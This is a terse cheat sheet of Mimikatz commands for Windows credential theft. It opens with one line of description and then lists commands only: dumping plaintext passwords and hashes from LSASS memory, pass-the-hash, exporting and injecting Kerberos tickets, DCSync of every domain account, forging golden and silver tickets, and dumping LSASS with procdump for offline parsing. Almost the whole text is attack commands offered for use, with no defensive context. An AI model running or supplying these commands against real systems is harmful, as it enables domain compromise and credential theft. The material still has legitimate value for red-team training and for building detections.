Mimikatz extracts plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.
privilege::debug
token::elevate
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::pth /user:admin /domain:corp /ntlm:HASH /run:cmd.exe
sekurlsa::tickets
sekurlsa::tickets /export
sekurlsa::ekeys
sekurlsa::dpapi
lsadump::sam
lsadump::lsa /patch
lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /all /csv
lsadump::cache
lsadump::secrets
kerberos::list /export
kerberos::ptt ticket.kirbi
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ticket:golden.kirbi
kerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /ticket:silver.kirbi
kerberos::purge
invoke-mimikatz -DumpCreds
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
procdump.exe -ma lsass.exe lsass.dmp
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"